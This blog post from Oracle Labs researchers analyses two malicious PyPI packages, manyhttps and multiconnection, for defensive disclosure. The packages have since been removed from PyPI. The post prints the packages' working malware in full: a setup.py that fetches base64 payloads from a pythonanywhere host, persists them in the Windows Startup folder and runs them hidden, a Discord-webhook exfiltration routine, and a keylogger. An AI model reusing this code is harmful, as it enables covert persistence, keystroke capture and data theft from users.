Detecting Malicious Behavior in Software Supply Chains, Part 1

Macaron is a supply-chain security analysis framework from Oracle Labs. We have recently open sourced this project to enable collaboration with others and to contribute to the open source security community. Over the past year, we’ve partnered with academics to develop new methods to automatically identify harmful Python packages in the PyPI repository, which is the main hub for Python packages. We share insights from our research through a series of articles, providing details for a chosen subset of these malicious packages. Additionally, all the methods we used to detect these threats will be shared with the community in our tool, Macaron. Explore this tutorial to get started, and watch for additional analysis as we further develop Macaron.

In our research, we’ve developed new analyses and identified and reported more than 180 malicious packages in the PyPI repository, which were confirmed by the PyPI security team and removed from the repository. In this first blog post, we provide a detailed description of the malicious packages manyhttps and multiconnection published on PyPI. These malicious packages were designed to perform Keystroke logging, taking Screenshots from the user’s environment, stealing cryptocurrencies, sending sensitive information to a remote server, and executing run malicious scripts every time a user logs in to the system.

Background

Detecting malicious behavior in open-source software has been a focus for the Open Source Security Foundation (OpenSSF) community in recent years. One significant initiative is Supply-chain Levels for Software Artifacts (SLSA), which offers practical recommendations to enhance the integrity of software packages and infrastructure. Macaron is designed to detect poorly maintained or malicious packages by implementing checks inspired by the SLSA specification. However, some forms of attacks currently fall outside the scope of SLSA version 1—notably, SLSA doesn’t address the issue of malicious maintainers. Our primary goal is to make it more difficult for malicious actors to compromise critical supply chains and infrastructure. To achieve this, we’re developing new methods to detect when maintainers of open source projects are untrustworthy and deliberately spread malware. Macaron prioritizes malware detection above vulnerability management in the supply chain to mitigate immediate risks and protect against unknown threats in diverse and complex environments.

The manyhttps Package

On May 1st, 2024, our analysis reported that the package manyhttps could perform malicious activities via setup.py. Moreover, a malicious actor had shown suspicious behavior on PyPI: the actor published one package with multiple versions within a few hours of registering an account.

After a few hours, the malicious actor deleted all but one version of the package. By querying the PyPI repository API, we collected these details and used them in our analysis to discover malicious activities on PyPI.

Now, let’s look at the malicious source code in the setup.py module.

# setup.py code snippet

import urllib.request
import zipfile
import os
import base64
import sys
import shutil
import time

if getattr(sys, ‘frozen’, False):
    currentFilePath = os.path.dirname(sys.executable)
else:
    currentFilePath = os.path.dirname(os.path.abspath(__file__))

fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)

startupFolderPath = os.path.join(os.path.expanduser(‘~’), ‘AppData’, ‘Roaming’, ‘Microsoft’, ‘Windows’, ‘Start Menu’, ‘Programs’, ‘Startup’)
startupFilePath = os.path.join(startupFolderPath, fileName)

loader_url = “https://frvezdffvv.pythonanywhere.com/getloader”
loader_name = urllib.request.urlopen(loader_url).read()

pyt_url = “https://frvezdffvv.pythonanywhere.com/getpyt”
pyt_name = urllib.request.urlopen(pyt_url).read()

with open(startupFolderPath+“\\pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(“pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(startupFolderPath+“\\pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)

with open(“pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)
import subprocess

subprocess.Popen([“python”, “pip.py”], creationflags=subprocess.CREATE_NO_WINDOW)
subprocess.Popen([“python”, “pyt.py”], creationflags=subprocess.CREATE_NO_WINDOW)
time.sleep(20)

Here are the key observations:

The malicious code resembles the code in cstealer, a tool designed for educational purposes to illustrate how secrets can be stolen.
The malicious code is split and stored on different endpoints of a remote server (possibly for obfuscation purposes).
The attack target is Windows users (possibly due to a large user base).
The malicious packages and code are stored on https://frvezdffvv.pythonanywhere.com/

Analysis of Each Section of setup.py

At the beginning of the source code, the current working directory is retrieved and the path to the setup.py file is determined.

if getattr(sys, ‘frozen’, False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))

fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)

Next, the code sets a file path under the Windows Startup directory.

startupFolderPath = os.path.join(os.path.expanduser(‘~’), ‘AppData’, ‘Roaming’, ‘Microsoft’, ‘Windows’, ‘Start Menu’, ‘Programs’, ‘Startup’)
startupFilePath = os.path.join(startupFolderPath, fileName)

Two base64-encoded code snippets are obtained from a remote server.

loader_url = “https://frvezdffvv.pythonanywhere.com/getloader”
loader_name = urllib.request.urlopen(loader_url).read()

pyt_url = “https://frvezdffvv.pythonanywhere.com/getpyt”
pyt_name = urllib.request.urlopen(pyt_url).read()

The two code snippets are decoded and written to the files pip.py and pyt.py under the current Startup directories. Note that the file names pip.py and pyt.py are used to hide the malicious code under “standard” file names, making them difficult to detect. We suspect that the reason for storing the same Python files in different directories is to ensure the code is run immediately and again whenever the user logs in. When these Python files run, the malicious code will be decoded and then run.

with open(startupFolderPath+“\\pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(“pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(startupFolderPath+“\\pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)

with open(“pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)

Finally, the two Python files pip.py and pyt.py are run using the subprocess module. Additionally, the code sets the CREATE_NO_WINDOW option to suppress the creation of a console window for each subprocess.

import subprocess

subprocess.Popen([“python”, “pip.py”], creationflags=subprocess.CREATE_NO_WINDOW)
subprocess.Popen([“python”, “pyt.py”], creationflags=subprocess.CREATE_NO_WINDOW)
time.sleep(20)

Analysis of the Malicious Payload Obtained from the Remote Server

getloader: https://frvezdffvv.pythonanywhere.com/getloader

The code obtained from getloader retrieves six packages as ZIP files from the remote server. Upon further examination, we discovered that several of these ZIP files were missing due to unknown issues. We hypothesize that the absent files are dependencies for cryptographic functions and certificates required by other packages.

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getcrypto”, ‘Crypto.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“Crypto.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/geturllib3”, ‘urllib3.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“urllib3.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getcharset”, ‘charset_normalizer.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“charset_normalizer.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getidna”, ‘idna.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“idna.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getcertifi”, ‘certifi.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“certifi.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getrequests”, ‘requests.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“requests.zip”)

getpackage: https://frvezdffvv.pythonanywhere.com/getpackage

The code obtained from getpackage retrieves the main attack payload from the remote server and then runs the code. The source code appears to be a modified version of the cstealer project available on GitHub.

package_url = “https://frvezdffvv.pythonanywhere.com/getpackage”
package_name = urllib.request.urlopen(package_url).read()
exec(base64.b64decode(package_name))

getpyt: https://frvezdffvv.pythonanywhere.com/getpyt

The code in getpyt sends the path of the current working directory to a webhook.

h00k = “https://discord.com/api/webhooks/1235100226247983124/ElCHWutw_oAGHKLC6lGJt6nT72p9eyw_Zk6Yqy_xaHJ4HQXM3Sxm62us6tNYnJSIqJty”

def L04DUr118(h00k, data=”, headers=”):
    for i in range(8):
        try:
            if headers != ”:
                r = urlopen(Request(h00k, data=data, headers=headers))
            else:
                r = urlopen(Request(h00k, data=data))
            return r
        except:
           pass

def test():
    headers = {
        “Content-Type”: “application/json”,
        “User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0”
    }

    data = {
        “content”: os.getcwd(),
    }

    L04DUr118(h00k, data=json.dumps(data).encode(), headers=headers)
test()

Next, getpyt obtains three packages from the remote server, which are used to control the window and log keystrokes.

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getpyrect”, ‘pyrect.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“pyrect.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getpygetwindow”, ‘pygetwindow.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“pygetwindow.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getkeyboard”, ‘keyboard.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“keyboard.zip”)

Finally, the hostname is sent to the server and the keystroke logging logic is implemented as shown below.

hook = “https://discord.com/api/webhooks/1235100226247983124/ElCHWutw_oAGHKLC6lGJt6nT72p9eyw_Zk6Yqy_xaHJ4HQXM3Sxm62us6tNYnJSIqJty”

msgcomp = {
“content”: str(socket.gethostname()) +” – Lgr online.”
}
r = requests.post(hook, json=msgcomp)

alphabet = [‘a’, ‘b’, ‘c’, ‘d’, ‘e’, ‘f’, ‘g’, ‘h’, ‘i’, ‘j’, ‘k’, ‘l’, ‘m’, ‘n’, ‘o’, ‘p’, ‘q’, ‘r’, ‘s’, ‘t’, ‘u’, ‘v’, ‘w’, ‘x’, ‘y’, ‘z’, ‘A’, ‘B’, ‘C’, ‘D’, ‘E’, ‘F’, ‘G’, ‘H’, ‘I’, ‘J’, ‘K’, ‘L’, ‘M’, ‘N’, ‘O’, ‘P’, ‘Q’, ‘R’, ‘S’, ‘T’, ‘U’, ‘V’, ‘W’, ‘X’, ‘Y’, ‘Z’, ‘!’, ‘@’, ‘#’, ‘$’, ‘%’, ‘^’, ‘&’, ‘*’, ‘(‘, ‘)’, ‘-‘, ‘_’, ‘+’, ‘=’, ‘{‘, ‘}’, ‘[‘, ‘]’, ‘|’, ‘\\’, ‘;’, ‘:’, “‘”, ‘”‘, ‘,’, ‘.’, ‘<‘, ‘>’, ‘/’, ‘?’, ‘0’, ‘1’, ‘2’, ‘3’, ‘4’, ‘5’, ‘6’, ‘7’, ‘8’, ‘9’]

def on_key(event):
    global msg
    global isupper
    global messages
    global alphabet

    try:
        try:
            focused_window = gw.getWindowsWithTitle(gw.getActiveWindowTitle())[0]
        except:
            focused_window = “None”

        if event.event_type == keyboard.KEY_DOWN:
            if “backspace” in event.name:
                try:
                    incompletemsgs[str(focused_window.title)] = incompletemsgs[str(focused_window.title)][:-1]
                except:
                    pass

            elif “enter” in event.name:
                try:
                    messages.append([str(focused_window.title), incompletemsgs[str(focused_window.title)]])
                    incompletemsgs[str(focused_window.title)] = “”
                except:
                    pass

            elif “space” in event.name:
                try:
                    incompletemsgs[str(focused_window.title)] = incompletemsgs[str(focused_window.title)]+ ” “
                except:
                    pass


            elif event.name in alphabet:
                msg = msg +(str(event.name))
                if str(focused_window.title) in incompletemsgs:
                    incompletemsgs[str(focused_window.title)] = incompletemsgs[str(focused_window.title)] + str(event.name)
                else:

                    incompletemsgs[str(focused_window.title)] = str(event.name)
    except:
        pass
keyboard.hook(on_key)

The multiconnection Package

A few days after reporting manyhttps, our analysis discovered a new package, multiconnection, which shared many similarities with manyhttps. For example, the malicious payload is stored in setup.py, and some irrelevant scripts are used to give the impression that the package is benign. Furthermore, the main malicious code is encoded in base64 and obtained from the frvezdffvvvv.pythonanywhere.com URL domain. Like manyhttps, this package aims to capture screenshots, steal sensitive information from the victim, and send that critical information to a Discord webhook.

Impact and Responsible Disclosure

The malicious packages, manyhttps and multiconnection, found by Macaron were designed to log keystrokes, take screenshots from the user’s environment, steal cryptocurrencies, send sensitive information to a remote server, and run malicious scripts every time the user logs in to the system. We have reported the malicious packages to the PyPI security team, and all the versions of these packages were immediately removed from PyPI.

Thank you for reading our first article in the malware detection series. Stay tuned for the next article on a different set of malicious packages, and meanwhile check out our open source project, Macaron. Start with this tutorial, and keep an eye out for further analysis as we continue to enhance Macaron. We look forward to your feedback and contributions.

Authors

Behnaz Hassanshahi, Principal researcher at Oracle labs

Yao Wen Chang, a Graduate from the University of Melbourne

Trong Nhan Mai, Software Engineer at Oracle Labs

Christoph Treude, Associate Professor at Singapore Management University